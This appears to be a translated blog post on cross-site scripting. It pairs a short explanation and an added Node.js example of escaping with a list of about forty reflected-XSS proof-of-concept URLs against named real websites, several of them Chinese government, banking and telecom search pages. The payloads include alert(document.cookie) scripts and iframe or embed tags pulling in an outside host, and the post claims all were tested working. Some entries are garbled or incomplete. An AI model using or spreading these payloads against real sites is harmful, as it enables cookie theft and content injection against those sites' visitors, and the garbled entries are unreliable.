Note: all of the links below were tested successfully in a browser.
For a web page, XSS means inserting content into the page without authorization. That is the vulnerability. What matters, though, is less the missing authorization than the content that gets inserted, which is usually harmful. The harm falls mostly on the other users who visit the page: the code you inserted runs in my browser.
"Runs" implies an environment, so every XSS payload depends on the context it lands in: where in the page the input is echoed and what the HTML parser is doing at that point. For XSS this is the most important question. It is also why the proofs of concept below so often start with "</title>", "</span>" or "\"/>": the search term is echoed inside the page title, inside a span or inside a quoted attribute, and the payload has to close that element first before its own <script>, <iframe> or <embed> is parsed as a real tag.
XSS is usually divided into persistent (stored) and non-persistent (reflected). In both cases opening a link causes the code, the malicious parameter, to run automatically. With persistent XSS the code is stored in the server's database, in fields such as a user name, a profile description or a password on some site; if those fields are not filtered, there is XSS. When I visit your page and your user name is a piece of code, I run that code and suffer whatever it does. Non-persistent XSS is a link with a parameter that is a piece of code: when I click it, the browser opens the link, the server-side program echoes the code parameter into the page it returns, and my browser executes it. Execution is triggered in real time by handing the code parameter to the program, which is exactly what the search pages below do.
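How the reflection context decides the payload, as an added example that is not part of the original post: a hypothetical search page, written in JavaScript for Node, that copies its q parameter into the <title>, into an input's value attribute and into the results heading (as the listed sites did), beside a version that escapes it. The function names, the template and the constructed PoC URL (built in the shape of the post's search.tianya.cn entry, with the post's www.chinaxiaoe.com host) are assumptions for the example, not the code of any site named on the page.

```javascript
// Added example, not from the original post. Assumed names: decodePoc,
// renderSearchPageVulnerable, renderSearchPageFixed, escapeHtml, hasTag, demo.
// The PoC URL is constructed in the shape of the post's Tianya entry.

// Decode one query parameter the way the server sees it (%XX and "+" decoded).
function decodePoc(url, param) {
  return new URL(url).searchParams.get(param);
}

// Vulnerable template: the search term is copied verbatim into three
// contexts. Inside <title> (RCDATA) a bare <embed> would be plain text, so
// the PoC closes the title first; in the <h1> it is a live tag straight away.
function renderSearchPageVulnerable(keyword) {
  return [
    "<html><head><title>Search: " + keyword + "</title></head>",
    '<body><input name="q" value="' + keyword + '">',
    "<h1>Results for " + keyword + "</h1></body></html>",
  ].join("\n");
}

// Escape the five characters that can end a text node, an RCDATA element or
// a quoted attribute. Not sufficient for unquoted attributes, URL attributes
// or script blocks; those need their own encoders.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Fixed template: same markup, keyword escaped for the contexts it enters.
function renderSearchPageFixed(keyword) {
  const k = escapeHtml(keyword);
  return [
    "<html><head><title>Search: " + k + "</title></head>",
    '<body><input name="q" value="' + k + '">',
    "<h1>Results for " + k + "</h1></body></html>",
  ].join("\n");
}

// Does the rendered HTML contain a real start tag for tagName?
// An escaped "&lt;embed" does not match; a live "<embed src=..." does.
function hasTag(html, tagName) {
  return new RegExp("<" + tagName + "[\\s/>]", "i").test(html);
}

// Constructed PoC (assumption) in the shape of the post's search.tianya.cn
// entry: </title><embed src=http://www.chinaxiaoe.com>, URL-encoded.
const POC_URL =
  "http://search.tianya.cn/?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E";

// Walk one PoC through both templates and report what each page contains.
function demo(url = POC_URL) {
  const payload = decodePoc(url, "q");
  return {
    payload,
    vulnerableHasEmbed: hasTag(renderSearchPageVulnerable(payload), "embed"),
    fixedHasEmbed: hasTag(renderSearchPageFixed(payload), "embed"),
  };
}

console.log(demo());
```

Run it with node; demo() returns the decoded payload together with a true/false pair showing that the unescaped page carries a live <embed> and the escaped page does not. The same harness accepts any of the post's URLs once the parameter name is adjusted, which is a quick way to confirm what a given PoC actually sends before testing it against a page you are authorized to test.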
First: mingwan B2B
http://search.b2b.cn/product?k=%3Cscript%3Ealert(%27RC%27)%3C%2Fscript%3E
Second: phoenixnet
http://my.ifeng.com/?c=friends&a=visit&ftype=6&friendName=%3C/title%3E%3Cscript%3Ealert('RC')%3C/script%3E
Third: China Electronic Network
http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Fourth: China Energy Network
http://www.power-cn.cn/sample/search.asp?txtitle=<script>alert(document.cookie)</script>
Fifth: 21CN
http://tags.21cn.com/tagsSearch?tags=%3Cscript%3Ealert()%3C/script%3E
Sixth: chinnet
http://mall.cnki.net/magazine/articlesearch.aspx?keys=%3Ciframe%20src='http://www.chinaxiaoe.com'%3E%3C/iframe%3E
Seventh: Computer World
http://www.ccw.com.cn/search/search_article.php?keyword=%3C%2Fspan%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E
Eighth: Suning Tesco
http://www.suning.com/emall/Search?SearchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E
Ninth: ANBO education www.2cto.com
http://www.miiceic.org.cn/plus/search.php?keyword=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3Ciframe%3E
Tenth: Pat Net
http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
11th: source code sky
http://www.codesky.net/article/search?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fiframe%3E
12th: Catalogue
http://so.mop.com?q=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E%3C/embed%3E
13th: Lili female
http://search.rayli.com.cn/searchII.html?lxkw=%3C/span%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E%3C/embed%3E
14th: glutinous rice Network
http://www.nuomi.com/search?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E%3C%2Fembed%3E
15th: CCN
http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp?query=Random_Coder%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E&site=2&id=1
18th: Pacific Network
http://ks.pconline.com.cn/index.jsp?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
19th: pangu search
http://news.panguso.com/newssearch.htm?orderType=1&q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
20th: 7K7K games
http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm
21st: mobile search
http://202.85.216.217/query?qt=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E
22nd: 19th Floor
http://www.19lou.com/search/thread?keyword=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
23rd: China Daily
http://search.chinadaily.com.cn/all_en.jsp?searchText=%22%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
24th: Download
http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
25th: Tianya community
http://search.tianya.cn?q=%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
26th: huajun Software Park
http://search.newhua.com/search_list.php?searchname=%3C%2Ftitle%3E%3Cembed%2F*%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
28th: Beidou Mobile Network
http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3e_00%1.htm
29th: appchina
http://www.appchina.com/market/berry/search.action?q=%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
30th: youren.com
http://user.younet.com/search/default.php?search_phone=\%22/%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E
31st: wheat bags
http://search.mbaobao.com/searcher?k=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
32nd: cofco I buy Network
http://www.womai.com/ProductList.htm?keywords=%3C%2Ftitle%3E%3Cembed%2F*%2Fsrc%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
33rd: Yangguang shopping
http://www.cnrmall.com/TV/product/search.jsp?key=%22/%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E
34th: Full-seat Network
http://s.manzuo.com/search?keyword=%22%2F%3E%3Cembed%20src%3Dhttp%3A%2F%2Fwww.chinaxiaoe.com%3E
35th: youtao ordering Network
http://www.utao365.com/search.php?encode=YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAiO3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU%2bPGVtYmVkIHNyYz1odHRwOi8vdG14ay5vcmc% (rest of the encode value garbled in source) &signature= (value missing in source)
36th: Meteorological Administration:
http://www.cma.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E
37th: Ministry of Transportation:
http://search.moc.gov.cn:8080/was40/search?searchword=%3Cembed//src=http://www.chinaxiaoe.com%3E
38th: Ministry of Culture:
http://app.mcprc.gov.cn:9000/was40/search?channelid=56599&searchword=%3Ciframe%20src=http://www.chinaxiaoe.com%3E%3C/iframe%3E
39th: People's Bank of China:
http://www.pbc.gov.cn:8080/dig/Default.jsp?q=%22/%3E%3Ciframe%20src=http://www.chinaxiaoe.com%3E/iframe%3E
40th: China Telecom
http://search.chinatelecom.com.cn/was40/search?searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E
41st: Communist Youth League of China
http://www.gqt.org.cn/was40/search?channelid=17472&searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E
42nd: Central compilation Board
http://search.cctb.net:8081/utf8/search.jsp?channelid=76134&searchword=%3Ciframe//src=http://www.chinaxiaoe.com%3E%3C/iframe%3E